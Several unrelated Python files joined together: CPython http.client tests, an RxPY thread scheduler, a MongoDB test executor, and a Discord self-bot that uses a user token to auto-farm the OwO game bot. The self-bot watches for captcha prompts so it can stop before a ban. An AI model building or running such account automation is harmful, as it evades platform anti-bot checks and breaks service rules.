class SourceAddressTest(TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(self.serv)
self.source_port = socket_helper.find_unused_port()
self.serv.listen()
self.conn = None
def tearDown(self):
if self.conn:
self.conn.close()
self.conn = None
self.serv.close()
self.serv = None
def testHTTPConnectionSourceAddress(self):
self.conn = client.HTTPConnection(HOST, self.port,
source_address=('', self.source_port))
self.conn.connect()
self.assertEqual(self.conn.sock.getsockname()[1], self.source_port)
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not defined')
def testHTTPSConnectionSourceAddress(self):
self.conn = client.HTTPSConnection(HOST, self.port,
source_address=('', self.source_port))
# We don't test anything here other than the constructor not barfing as
# this code doesn't deal with setting up an active running SSL server
# for an ssl_wrapped connect() to actually return from.
class TimeoutTest(TestCase):
PORT = None
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TimeoutTest.PORT = socket_helper.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
def testTimeoutAttribute(self):
# This will prove that the timeout gets through HTTPConnection
# and into the socket.
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
# no timeout -- do not use global socket default
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT,
timeout=None)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), None)
httpConn.close()
# a value
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT, timeout=30)
httpConn.connect()
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
class PersistenceTest(TestCase):
def test_reuse_reconnect(self):
# Should reuse or reconnect depending on header from server
tests = (
('1.0', '', False),
('1.0', 'Connection: keep-alive\r\n', True),
('1.1', '', True),
('1.1', 'Connection: close\r\n', False),
('1.0', 'Connection: keep-ALIVE\r\n', True),
('1.1', 'Connection: cloSE\r\n', False),
)
for version, header, reuse in tests:
with self.subTest(version=version, header=header):
msg = (
'HTTP/{} 200 OK\r\n'
'{}'
'Content-Length: 12\r\n'
'\r\n'
'Dummy body\r\n'
).format(version, header)
conn = FakeSocketHTTPConnection(msg)
self.assertIsNone(conn.sock)
conn.request('GET', '/open-connection')
with conn.getresponse() as response:
self.assertEqual(conn.sock is None, not reuse)
response.read()
self.assertEqual(conn.sock is None, not reuse)
self.assertEqual(conn.connections, 1)
conn.request('GET', '/subsequent-request')
self.assertEqual(conn.connections, 1 if reuse else 2)
def test_disconnected(self):
def make_reset_reader(text):
"""Return BufferedReader that raises ECONNRESET at EOF"""
stream = io.BytesIO(text)
def readinto(buffer):
size = io.BytesIO.readinto(stream, buffer)
if size == 0:
raise ConnectionResetError()
return size
stream.readinto = readinto
return io.BufferedReader(stream)
tests = (
(io.BytesIO, client.RemoteDisconnected),
(make_reset_reader, ConnectionResetError),
)
for stream_factory, exception in tests:
with self.subTest(exception=exception):
conn = FakeSocketHTTPConnection(b'', stream_factory)
conn.request('GET', '/eof-response')
self.assertRaises(exception, conn.getresponse)
self.assertIsNone(conn.sock)
# HTTPConnection.connect() should be automatically invoked
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
def test_100_close(self):
conn = FakeSocketHTTPConnection(
b'HTTP/1.1 100 Continue\r\n'
b'\r\n'
# Missing final response
)
conn.request('GET', '/', headers={'Expect': '100-continue'})
self.assertRaises(client.RemoteDisconnected, conn.getresponse)
self.assertIsNone(conn.sock)
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
class HTTPSTest(TestCase):
def setUp(self):
if not hasattr(client, 'HTTPSConnection'):
self.skipTest('ssl support required')
def make_server(self, certfile):
from test.ssl_servers import make_https_server
return make_https_server(self, certfile=certfile)
def test_attributes(self):
# simple test to check it's storing the timeout
h = client.HTTPSConnection(HOST, TimeoutTest.PORT, timeout=30)
self.assertEqual(h.timeout, 30)
def test_networked(self):
# Default settings: requires a valid cert from a trusted CA
import ssl
support.requires('network')
with socket_helper.transient_internet('self-signed.pythontest.net'):
h = client.HTTPSConnection('self-signed.pythontest.net', 443)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_networked_noverification(self):
# Switch off cert verification
import ssl
support.requires('network')
with socket_helper.transient_internet('self-signed.pythontest.net'):
context = ssl._create_unverified_context()
h = client.HTTPSConnection('self-signed.pythontest.net', 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
h.close()
self.assertIn('nginx', resp.getheader('server'))
resp.close()
@support.system_must_validate_cert
def test_networked_trusted_by_default_cert(self):
# Default settings: requires a valid cert from a trusted CA
support.requires('network')
with socket_helper.transient_internet('www.python.org'):
h = client.HTTPSConnection('www.python.org', 443)
h.request('GET', '/')
resp = h.getresponse()
content_type = resp.getheader('content-type')
resp.close()
h.close()
self.assertIn('text/html', content_type)
def test_networked_good_cert(self):
# We feed the server's cert as a validating cert
import ssl
support.requires('network')
selfsigned_pythontestdotnet = 'self-signed.pythontest.net'
with socket_helper.transient_internet(selfsigned_pythontestdotnet):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(context.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(context.check_hostname, True)
context.load_verify_locations(CERT_selfsigned_pythontestdotnet)
try:
h = client.HTTPSConnection(selfsigned_pythontestdotnet, 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
except ssl.SSLError as ssl_err:
ssl_err_str = str(ssl_err)
# In the error message of [SSL: CERTIFICATE_VERIFY_FAILED] on
# modern Linux distros (Debian Buster, etc) default OpenSSL
# configurations it'll fail saying "key too weak" until we
# address https://bugs.python.org/issue36816 to use a proper
# key size on self-signed.pythontest.net.
if re.search(r'(?i)key.too.weak', ssl_err_str):
raise unittest.SkipTest(
f'Got {ssl_err_str} trying to connect '
f'to {selfsigned_pythontestdotnet}. '
'See https://bugs.python.org/issue36816.')
raise
server_string = resp.getheader('server')
resp.close()
h.close()
self.assertIn('nginx', server_string)
def test_networked_bad_cert(self):
# We feed a "CA" cert that is unrelated to the server's cert
import ssl
support.requires('network')
with socket_helper.transient_internet('self-signed.pythontest.net'):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_unknown_cert(self):
# The custom cert isn't known to the default trust bundle
import ssl
server = self.make_server(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_good_hostname(self):
# The (valid) cert validates the HTTP hostname
import ssl
server = self.make_server(CERT_localhost)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port, context=context)
self.addCleanup(h.close)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.addCleanup(resp.close)
self.assertEqual(resp.status, 404)
def test_local_bad_hostname(self):
# The (valid) cert doesn't validate the HTTP hostname
import ssl
server = self.make_server(CERT_fakehostname)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_fakehostname)
h = client.HTTPSConnection('localhost', server.port, context=context)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# Same with explicit check_hostname=True
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# With check_hostname=False, the mismatching is ignored
context.check_hostname = False
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=False)
h.request('GET', '/nonexistent')
resp = h.getresponse()
resp.close()
h.close()
self.assertEqual(resp.status, 404)
# The context's check_hostname setting is used if one isn't passed to
# HTTPSConnection.
context.check_hostname = False
h = client.HTTPSConnection('localhost', server.port, context=context)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.assertEqual(resp.status, 404)
resp.close()
h.close()
# Passing check_hostname to HTTPSConnection should override the
# context's setting.
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not available')
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPSConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:443", "www.python.org", 443),
("www.python.org:", "www.python.org", 443),
("www.python.org", "www.python.org", 443),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 443),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b",
443)):
c = client.HTTPSConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_tls13_pha(self):
import ssl
if not ssl.HAS_TLSv1_3:
self.skipTest('TLS 1.3 support required')
# just check status of PHA flag
h = client.HTTPSConnection('localhost', 443)
self.assertTrue(h._context.post_handshake_auth)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertFalse(context.post_handshake_auth)
h = client.HTTPSConnection('localhost', 443, context=context)
self.assertIs(h._context, context)
self.assertFalse(h._context.post_handshake_auth)
with warnings.catch_warnings():
warnings.filterwarnings('ignore', 'key_file, cert_file and check_hostname are deprecated',
DeprecationWarning)
h = client.HTTPSConnection('localhost', 443, context=context,
cert_file=CERT_localhost)
self.assertTrue(h._context.post_handshake_auth)
class RequestBodyTest(TestCase):
"""Test cases where a request includes a message body."""
def setUp(self):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket("")
self.conn.sock = self.sock
def get_headers_and_fp(self):
f = io.BytesIO(self.sock.data)
f.readline() # read the request line
message = client.parse_headers(f)
return message, f
def test_list_body(self):
# Note that no content-length is automatically calculated for
# an iterable. The request will fall back to send chunked
# transfer encoding.
cases = (
([b'foo', b'bar'], b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
((b'foo', b'bar'), b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
)
for body, expected in cases:
with self.subTest(body):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket('')
self.conn.request('PUT', '/url', body)
msg, f = self.get_headers_and_fp()
self.assertNotIn('Content-Type', msg)
self.assertNotIn('Content-Length', msg)
self.assertEqual(msg.get('Transfer-Encoding'), 'chunked')
self.assertEqual(expected, f.read())
def test_manual_content_length(self):
# Set an incorrect content-length so that we can verify that
# it will not be over-ridden by the library.
self.conn.request("PUT", "/url", "body",
{"Content-Length": "42"})
message, f = self.get_headers_and_fp()
self.assertEqual("42", message.get("content-length"))
self.assertEqual(4, len(f.read()))
def test_ascii_body(self):
self.conn.request("PUT", "/url", "body")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("4", message.get("content-length"))
self.assertEqual(b'body', f.read())
def test_latin1_body(self):
self.conn.request("PUT", "/url", "body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_bytes_body(self):
self.conn.request("PUT", "/url", b"body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_text_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "w") as f:
f.write("body")
with open(support.TESTFN) as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
# No content-length will be determined for files; the body
# will be sent using chunked transfer encoding instead.
self.assertIsNone(message.get("content-length"))
self.assertEqual("chunked", message.get("transfer-encoding"))
self.assertEqual(b'4\r\nbody\r\n0\r\n\r\n', f.read())
def test_binary_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "wb") as f:
f.write(b"body\xc1")
with open(support.TESTFN, "rb") as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("chunked", message.get("Transfer-Encoding"))
self.assertNotIn("Content-Length", message)
self.assertEqual(b'5\r\nbody\xc1\r\n0\r\n\r\n', f.read())
class HTTPResponseTest(TestCase):
def setUp(self):
body = "HTTP/1.1 200 Ok\r\nMy-Header: first-value\r\nMy-Header: \
second-value\r\n\r\nText"
sock = FakeSocket(body)
self.resp = client.HTTPResponse(sock)
self.resp.begin()
def test_getting_header(self):
header = self.resp.getheader('My-Header')
self.assertEqual(header, 'first-value, second-value')
header = self.resp.getheader('My-Header', 'some default')
self.assertEqual(header, 'first-value, second-value')
def test_getting_nonexistent_header_with_string_default(self):
header = self.resp.getheader('No-Such-Header', 'default-value')
self.assertEqual(header, 'default-value')
def test_getting_nonexistent_header_with_iterable_default(self):
header = self.resp.getheader('No-Such-Header', ['default', 'values'])
self.assertEqual(header, 'default, values')
header = self.resp.getheader('No-Such-Header', ('default', 'values'))
self.assertEqual(header, 'default, values')
def test_getting_nonexistent_header_without_default(self):
header = self.resp.getheader('No-Such-Header')
self.assertEqual(header, None)
def test_getting_header_defaultint(self):
header = self.resp.getheader('No-Such-Header',default=42)
self.assertEqual(header, 42)
class TunnelTests(TestCase):
def setUp(self):
response_text = (
'HTTP/1.0 200 OK\r\n\r\n' # Reply to CONNECT
'HTTP/1.1 200 OK\r\n' # Reply to HEAD
'Content-Length: 42\r\n\r\n'
)
self.host = 'proxy.com'
self.conn = client.HTTPConnection(self.host)
self.conn._create_connection = self._create_connection(response_text)
def tearDown(self):
self.conn.close()
def _create_connection(self, response_text):
def create_connection(address, timeout=None, source_address=None):
return FakeSocket(response_text, host=address[0], port=address[1])
return create_connection
def test_set_tunnel_host_port_headers(self):
tunnel_host = 'destination.com'
tunnel_port = 8888
tunnel_headers = {'User-Agent': 'Mozilla/5.0 (compatible, MSIE 11)'}
self.conn.set_tunnel(tunnel_host, port=tunnel_port,
headers=tunnel_headers)
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertEqual(self.conn._tunnel_host, tunnel_host)
self.assertEqual(self.conn._tunnel_port, tunnel_port)
self.assertEqual(self.conn._tunnel_headers, tunnel_headers)
def test_disallow_set_tunnel_after_connect(self):
# Once connected, we shouldn't be able to tunnel anymore
self.conn.connect()
self.assertRaises(RuntimeError, self.conn.set_tunnel,
'destination.com')
def test_connect_with_tunnel(self):
self.conn.set_tunnel('destination.com')
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
# issue22095
self.assertNotIn(b'Host: destination.com:None', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
# This test should be removed when CONNECT gets the HTTP/1.1 blessing
self.assertNotIn(b'Host: proxy.com', self.conn.sock.data)
def test_connect_put_request(self):
self.conn.set_tunnel('destination.com')
self.conn.request('PUT', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
def test_tunnel_debuglog(self):
expected_header = 'X-Dummy: 1'
response_text = 'HTTP/1.0 200 OK\r\n{}\r\n\r\n'.format(expected_header)
self.conn.set_debuglevel(1)
self.conn._create_connection = self._create_connection(response_text)
self.conn.set_tunnel('destination.com')
with support.captured_stdout() as output:
self.conn.request('PUT', '/', '')
lines = output.getvalue().splitlines()
self.assertIn('header: {}'.format(expected_header), lines)
if __name__ == '__main__':
unittest.main(verbosity=2)
|
newthreadscheduler.py
|
import logging
import threading
from .scheduler import Scheduler
from .eventloopscheduler import EventLoopScheduler
log = logging.getLogger('Rx')
class NewThreadScheduler(Scheduler):
"""Creates an object that schedules each unit of work on a separate thread.
"""
def __init__(self, thread_factory=None):
super(NewThreadScheduler, self).__init__()
def default_factory(target, args=None):
t = threading.Thread(target=target, args=args or [])
t.setDaemon(True)
return t
self.thread_factory = thread_factory or default_factory
def schedule(self, action, state=None):
"""Schedules an action to be executed."""
scheduler = EventLoopScheduler(thread_factory=self.thread_factory, exit_if_empty=True)
return scheduler.schedule(action, state)
def schedule_relative(self, duetime, action, state=None):
"""Schedules an action to be executed after duetime."""
scheduler = EventLoopScheduler(thread_factory=self.thread_factory, exit_if_empty=True)
return scheduler.schedule_relative(duetime, action, state)
def schedule_absolute(self, duetime, action, state=None):
"""Schedules an action to be executed at duetime."""
return self.schedule_relative(duetime - self.now(), action, state=None)
Scheduler.new_thread = new_thread_scheduler = NewThreadScheduler()
|
executor.py
|
"""Driver of the test execution framework."""
from __future__ import absolute_import
import threading
import time
from . import fixtures
from . import hook_test_archival as archival
from . import hooks as _hooks
from . import job as _job
from . import report as _report
from . import testcases
from .. import config as _config
from .. import errors
from .. import utils
from ..core import network
from ..utils import queue as _queue
class TestSuiteExecutor(object): # pylint: disable=too-many-instance-attributes
"""Execute a test suite.
Responsible for setting up and tearing down the fixtures that the
tests execute against.
"""
_TIMEOUT = 24 * 60 * 60 # =1 day (a long time to have tests run)
def __init__( # pylint: disable=too-many-arguments
self, exec_logger, suite, config=None, fixture=None, hooks=None, archive_instance=None,
archive=None):
"""Initialize the TestSuiteExecutor with the test suite to run."""
self.logger = exec_logger
if _config.SHELL_CONN_STRING is not None:
# Specifying the shellConnString command line option should override the fixture
# specified in the YAML configuration to be the no-op fixture.
self.fixture_config = {"class": fixtures.NOOP_FIXTURE_CLASS}
else:
self.fixture_config = fixture
self.hooks_config = utils.default_if_none(hooks, [])
self.test_config = utils.default_if_none(config, {})
self.archival = None
if archive_instance:
self.archival = archival.HookTestArchival(suite, self.hooks_config, archive_instance,
archive)
self._suite = suite
self.test_queue_logger = self.logger.new_testqueue_logger(suite.test_kind)
# Only start as many jobs as we need. Note this means that the number of jobs we run may
# not actually be _config.JOBS or self._suite.options.num_jobs.
jobs_to_start = self._suite.options.num_jobs
self.num_tests = len(suite.tests) * self._suite.options.num_repeat_tests
if self.num_tests < jobs_to_start:
self.logger.info(
"Reducing the number of jobs from %d to %d since there are only %d test(s) to run.",
self._suite.options.num_jobs, self.num_tests, self.num_tests)
jobs_to_start = self.num_tests
# Must be done after getting buildlogger configuration.
self._jobs = [self._make_job(job_num) for job_num in xrange(jobs_to_start)]
def run(self):
"""Execute the test suite.
Any exceptions that occur during setting up or tearing down a
fixture are propagated.
"""
self.logger.info("Starting execution of %ss...", self._suite.test_kind)
return_code = 0
# The first run of the job will set up the fixture.
setup_flag = threading.Event()
# We reset the internal state of the PortAllocator so that ports used by the fixture during
# a test suite run earlier can be reused during this current test suite.
network.PortAllocator.reset()
teardown_flag = None
try:
num_repeat_suites = self._suite.options.num_repeat_suites
while num_repeat_suites > 0:
test_queue = self._make_test_queue()
partial_reports = [job.report for job in self._jobs]
self._suite.record_test_start(partial_reports)
# Have the Job threads destroy their fixture during the final repetition after they
# finish running their last test. This avoids having a large number of processes
# still running if an Evergreen task were to time out from a hang/deadlock being
# triggered.
teardown_flag = threading.Event() if num_repeat_suites == 1 else None
(report, interrupted) = self._run_tests(test_queue, setup_flag, teardown_flag)
self._suite.record_test_end(report)
if setup_flag and setup_flag.is_set():
self.logger.error("Setup of one of the job fixtures failed")
return_code = 2
return
# Remove the setup flag once the first suite ran.
setup_flag = None
# If the user triggered a KeyboardInterrupt, then we should stop.
if interrupted:
raise errors.UserInterrupt("Received interrupt from user")
if teardown_flag and teardown_flag.is_set():
return_code = 2
sb = [] # String builder.
self._suite.summarize_latest(sb)
self.logger.info("Summary: %s", "\n ".join(sb))
if not report.wasSuccessful():
return_code = 1
if self._suite.options.fail_fast:
break
test_report = report.as_dict()
test_results_num = len(test_report["results"])
# There should be at least as many tests results as expected number of tests.
if test_results_num < self.num_tests:
raise errors.ResmokeError("{} reported tests is less than {} expected tests"
.format(test_results_num, self.num_tests))
# Clear the report so it can be reused for the next execution.
for job in self._jobs:
job.report.reset()
num_repeat_suites -= 1
finally:
if not teardown_flag:
if not self._teardown_fixtures():
return_code = 2
self._suite.return_code = return_code
def _run_tests(self, test_queue, setup_flag, teardown_flag):
"""Start a thread for each Job instance and block until all of the tests are run.
Returns a (combined report, user interrupted) pair, where the
report contains the status and timing information of tests run
by all of the threads.
"""
threads = []
interrupt_flag = threading.Event()
user_interrupted = False
try:
# Run each Job instance in its own thread.
for job in self._jobs:
thr = threading.Thread(target=job, args=(test_queue, interrupt_flag), kwargs=dict(
setup_flag=setup_flag, teardown_flag=teardown_flag))
# Do not wait for tests to finish executing if interrupted by the user.
thr.daemon = True
thr.start()
threads.append(thr)
# SERVER-24729 Need to stagger when jobs start to reduce I/O load if there
# are many of them. Both the 5 and the 10 are arbitrary.
# Currently only enabled on Evergreen.
if _config.STAGGER_JOBS and len(threads) >= 5:
time.sleep(10)
joined = False
while not joined:
# Need to pass a timeout to join() so that KeyboardInterrupt exceptions
# are propagated.
joined = test_queue.join(TestSuiteExecutor._TIMEOUT)
except (KeyboardInterrupt, SystemExit):
interrupt_flag.set()
user_interrupted = True
else:
# Only wait for all the Job instances if not interrupted by the user.
for thr in threads:
thr.join()
reports = [job.report for job in self._jobs]
combined_report = _report.TestReport.combine(*reports)
# We cannot return 'interrupt_flag.is_set()' because the interrupt flag can be set by a Job
# instance if a test fails and it decides to drain the queue. We only want to raise a
# StopExecution exception in TestSuiteExecutor.run() if the user triggered the interrupt.
return (combined_report, user_interrupted)
def _teardown_fixtures(self):
"""Tear down all of the fixtures.
Returns true if all fixtures were torn down successfully, and
false otherwise.
"""
success = True
for job in self._jobs:
if not job.teardown_fixture():
self.logger.warning("Teardown of %s of job %s was not successful", job.fixture,
job.job_num)
success = False
return success
def _make_fixture(self, job_num, job_logger):
"""Create a fixture for a job."""
fixture_config = {}
fixture_class = fixtures.NOOP_FIXTURE_CLASS
if self.fixture_config is not None:
fixture_config = self.fixture_config.copy()
fixture_class = fixture_config.pop("class")
fixture_logger = job_logger.new_fixture_logger(fixture_class)
return fixtures.make_fixture(fixture_class, fixture_logger, job_num, **fixture_config)
def _make_hooks(self, fixture):
"""Create the hooks for the job's fixture."""
hooks = []
for hook_config in self.hooks_config:
hook_config = hook_config.copy()
hook_class = hook_config.pop("class")
hook_logger = self.logger.new_hook_logger(hook_class, fixture.logger)
hook = _hooks.make_hook(hook_class, hook_logger, fixture, **hook_config)
hooks.append(hook)
return hooks
def _make_job(self, job_num):
"""Return a Job instance with its own fixture, hooks, and test report."""
job_logger = self.logger.new_job_logger(self._suite.test_kind, job_num)
fixture = self._make_fixture(job_num, job_logger)
hooks = self._make_hooks(fixture)
report = _report.TestReport(job_logger, self._suite.options)
return _job.Job(job_num, job_logger, fixture, hooks, report, self.archival,
self._suite.options, self.test_queue_logger)
def _make_test_queue(self):
"""Return a queue of TestCase instances.
Use a multi-consumer queue instead of a unittest.TestSuite so
that the test cases can be dispatched to multiple threads.
"""
# Put all the test cases in a queue.
queue = _queue.Queue()
for _ in range(self._suite.options.num_repeat_tests):
for test_name in self._suite.tests:
test_case = testcases.make_test_case(self._suite.test_kind, self.test_queue_logger,
test_name, **self.test_config)
queue.put(test_case)
# Add sentinel value for each job to indicate when there are no more items to process.
for _ in xrange(len(self._jobs)):
queue.put(None)
return queue
|
main.py
|
from json.decoder import JSONDecodeError
import discum_c844aef
import time
import multiprocessing
import random
import re
import os
from functools import cache
from discum_c844aef.discum import Client
if os.name == 'posix':
import simplejson as json
if os.name == 'nt':
import json
if os.name != 'nt' and 'posix':
print("Your OS System Is Not Supported! We Sorry...")
time.sleep(2)
exit()
print("""\
░█████╗░░██╗░░░░░░░██╗░█████╗░ ░██████╗███████╗██╗░░░░░███████╗ ██████╗░░█████╗░████████╗
██╔══██╗░██║░░██╗░░██║██╔══██╗ ██╔════╝██╔════╝██║░░░░░██╔════╝ ██╔══██╗██╔══██╗╚══██╔══╝
██║░░██║░╚██╗████╗██╔╝██║░░██║ ╚█████╗░█████╗░░██║░░░░░█████╗░░ ██████╦╝██║░░██║░░░██║░░░
██║░░██║░░████╔═████║░██║░░██║ ░╚═══██╗██╔══╝░░██║░░░░░██╔══╝░░ ██╔══██╗██║░░██║░░░██║░░░
╚█████╔╝░░╚██╔╝░╚██╔╝░╚█████╔╝ ██████╔╝███████╗███████╗██║░░░░░ ██████╦╝╚█████╔╝░░░██║░░░
░╚════╝░░░░╚═╝░░░╚═╝░░░╚════╝░ ╚═════╝░╚══════╝╚══════╝╚═╝░░░░░ ╚═════╝░░╚════╝░░░░╚═╝░░░
**Version: 1.0.9**""")
time.sleep(2)
try:
from tkinter import messagebox
use_terminal=False
except:
use_terminal=True
once=False
wbm=[12,16]
update = 0
class bot:
commands=[
"owo hunt",
"owo hunt",
"owo battle"
]
class color:
purple = '\033[95m'
okblue = '\033[94m'
okcyan = '\033[96m'
okgreen = '\033[92m'
warning = '\033[93m'
fail = '\033[91m'
reset = '\033[0m'
bold = '\033[1m'
underline = '\033[4m'
if os.name == "nt":
purple = ''
okblue = ''
okcyan = ''
okgreen = ''
warning = ''
fail = ''
reset = ''
bold = ''
underline = ''
owoid=408785106942164992
with open('settings.json', "r") as file:
data = json.load(file)
token = data["token"]
channel = data["channel"]
channel2 = data["owodmid"]
proxy = data["proxy"]
proxyserver = data["proxy_"]["server"]
proxyport = data["proxy_"]["port"]
print('=========================')
print('| |')
print('| [1] Load data |')
print('| [2] Create new data |')
print('| |')
print('========================')
time.sleep(1)
time.sleep(1)
choice = int(input('Enter your choice: '))
if (choice == 1):
pass
if (choice == 2):
os.system('py newdata.py')
@cache
def at():
return f'\033[0;43m{time.strftime("%d %b %Y %H:%M:%S", time.localtime())}\033[0;21m'
def report_error(content):
if use_terminal:
print(at(), content)
else:
messagebox.showerror("OWO Auto Farm", content)
client=discum_c844aef.Client(token=bot.token,proxy_host=bot.proxyserver, proxy_port=bot.proxyport, log=False)
def issuechecker():
try:
msgs=client.getMessages(str(bot.channel),num=10)
msgs=json.loads(msgs.text)
owodes=0
for msgone in msgs:
if msgone['author']['id']==str(bot.owoid):
owodes=owodes+1
msgonec=msgone['content']
if "DM me with only" in msgonec:
return "exit"
if "(2/5)" in str(msgonec):
return "exit"
if "(3/5)" in str(msgonec):
return "exit"
if "(4/5)" in str(msgonec):
return "exit"
if "(5/5)" in str(msgonec):
return "exit"
if 'banned' in msgonec:
print(f'{at()}{bot.color.fail} !!! [BANNED] !!! {bot.color.reset} your account have been banned from owo bot please open a issue on the Support Discord server')
return "exit"
if 'complete your captcha' in msgonec:
print(f'{at()}{bot.color.warning} !! [CAPTCHA] !! {bot.color.reset} CAPTCHA ACTION REQUİRED {msgonec[-6:]}')
return "exit"
if 'If you have trouble solving the captcha, please ask us in our support guild!' in msgonec:
print(f'{at()}{bot.color.warning} !! [CAPTCHA] !! {bot.color.reset} CAPTCHA ACTION REQUİRED')
return "exit"
if 'captcha' in msgonec:
return "exit"
if 'Beep Boop.' in msgonec:
return "exit"
if 'verify that you are human!' in msgonec:
return "exit"
if 'to check that you are a human!' in msgonec:
return "exit"
if '⚠️' in msgonec:
return "exit"
if 'Please DM me with only the following' in msgonec:
return "exit"
if 'Please reply with the following 4 letter word so I can check!' in msgonec:
return "exit"
if not owodes:
return "exit"
except TypeError:
pass
def issuechecker2():
try:
msgs=client.getMessages(str(bot.channel2),num=5)
msgs=json.loads(msgs.text)
owodes=0
for msgone in msgs:
if msgone['author']['id']==str(bot.owoid):
owodes=owodes+1
msgonec=msgone['content']
if 'Are you a real human?' in msgonec:
return "exit"
if 'http://verify.owobot.com' in msgonec:
return "exit"
if '?' in str(msgonec):
return "exit"
if not owodes:
pass
if 'I have verified that you are human! Thank you! :3' in msgonec:
return "nocap"
except TypeError:
pass
except JSONDecodeError:
if os.name == 'nt':
pass
if os.name == 'posix':
pass
else:
input("There is an error while running, do you want to ignore and continue? (YES/NO): ")
if input == 'YES':
pass
if input == 'NO':
print('\033[31m' + '[Exit] Cancelled')
time.sleep(2)
exit()
def security():
if issuechecker() == "exit":
client.sendMessage(str(bot.channel), "@here CAPTCHA!")
report_error("Ban-security triggered, answer the captcha")
exit()
if issuechecker2() == "exit":
client.sendMessage(str(bot.channel), "@here CAPTCHA!")
report_error("Ban-security triggered, found captcha in DMs")
exit()
if issuechecker2() == "nocap":
client.sendMessage(str(bot.channel2), "Ahh yes no captcha, have a nice day!")
pass
def runner():
global wbm
owodes=0
